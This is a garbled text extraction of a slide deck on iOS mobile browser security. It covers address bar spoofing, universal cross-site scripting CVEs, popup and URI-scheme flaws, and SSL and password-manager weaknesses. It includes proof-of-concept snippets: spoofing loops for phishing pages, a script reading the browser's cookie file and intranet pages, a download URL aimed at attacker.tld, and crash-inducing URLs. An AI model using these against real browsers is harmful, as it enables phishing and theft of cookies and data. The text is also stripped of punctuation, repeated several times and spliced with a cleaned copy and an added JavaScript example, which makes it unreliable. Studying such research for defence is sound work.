Mobile Browsers Security iOS
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
CVE-2013-7197: UXSS in Yandex.Browser

CVE-2013-7197 Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS

Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]

CVE-2012-2899 Chrome UXSS
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files.

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)

Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL … @"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
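The check that the three bugs above got wrong, plus the fixed base URL of the safe variant, as an added JavaScript example (not code from the slides or from Mercury, Yandex.Browser or Chrome for iOS). FakeBridge with open/navigate/effectiveURL/write is a hypothetical stand-in for the native side; the block runs under Node.js using the global WHATWG URL class.

```javascript
// Added example: the JavaScript-side gate of a bridge-based cross-tab
// window.open()/document.write(), written against the three failure modes
// on the slides:
//  - Mercury: no origin check at all;
//  - Yandex: origin checked at window.open() but not again at document.write()
//    (the child may have been redirected in between);
//  - Chrome for iOS: written HTML loaded with baseURL nil (applewebdata://)
//    or with the target page's own URL.
// FakeBridge is a hypothetical simulation of the native side (constructed
// for this example); a real browser would cross into Objective-C there.

// Schemes that never form a web origin a page may be granted: about:blank
// ("no URL"), applewebdata:// (UIWebView with baseURL nil), file://, data:.
const OPAQUE_SCHEMES = new Set(['about:', 'applewebdata:', 'file:', 'data:']);

// Origin tuple (scheme, host, port) of a URL, or null when the URL is opaque,
// unparseable or not http(s). Default ports are filled in so that
// https://a.tld and https://a.tld:443 compare equal.
function originOf(urlString) {
  let u;
  try { u = new URL(String(urlString)); } catch (e) { return null; }
  if (OPAQUE_SCHEMES.has(u.protocol)) return null;
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return { scheme: u.protocol, host: u.hostname, port };
}

// Strict same-origin test: scheme, host and port must all match, and an
// opaque origin never matches anything, not even itself.
function sameOrigin(a, b) {
  const oa = originOf(a), ob = originOf(b);
  if (oa === null || ob === null) return false;
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Simulated native tab table. A tab opened on about:blank carries the origin
// of its opener until it is navigated elsewhere, as a fresh about:blank popup
// does in real browsers.
class FakeBridge {
  constructor() { this.tabs = new Map(); this.nextId = 1; }
  open(url, openerURL) {
    const id = this.nextId++;
    this.tabs.set(id, { url, openerURL, html: null, baseURL: null });
    return id;
  }
  navigate(id, url) { this.tabs.get(id).url = url; }   // e.g. a redirect in the child
  effectiveURL(id) {
    const t = this.tabs.get(id);
    return t.url === 'about:blank' ? t.openerURL : t.url;
  }
  // The native load of written HTML. The base URL is pinned to about:blank:
  // never nil (that yields applewebdata:// with file-like privileges) and
  // never the target tab's URL (that would grant the target's origin).
  write(id, html) {
    const t = this.tabs.get(id);
    t.html = html;
    t.baseURL = 'about:blank';
  }
}

// The window.open() replacement a browser would inject into every page.
// openerURL is location.href of the calling document.
function makeWindowOpen(bridge, openerURL) {
  return function open(url) {
    const id = bridge.open(url, openerURL);
    return {
      id,
      document: {
        write(html) {
          // Re-check at call time against the child's current URL, not the
          // URL that was passed to window.open(): the child may have moved.
          if (!sameOrigin(openerURL, bridge.effectiveURL(id))) {
            throw new Error('SecurityError: cross-origin document.write blocked');
          }
          bridge.write(id, html);
        },
      },
    };
  };
}
```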
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil (for a string that does not parse as a URL)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL (same case)
• Downloads opened directly from file://

Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other, filename *.html

JS without Same-Origin-Policy
    <script>
    a = document.location.href.split('/');
    if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
    path = path + '/Library/Cookies/Cookies.binarycookies';
    x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
    </script>

JS without Same-Origin-Policy
    <script>
    x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText);
    </script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header: HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

Popup blockers: application (bolted-on) vs. native (WebKit)
URI schemes: bridge (internal) vs. registered (external)
• scheme://download/https://secure.tld/victim/data
• scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0x00000000
    0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
    <iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, iOS UIWebView https requests with invalid certificates are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript runs with the privileges of the top frame -> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
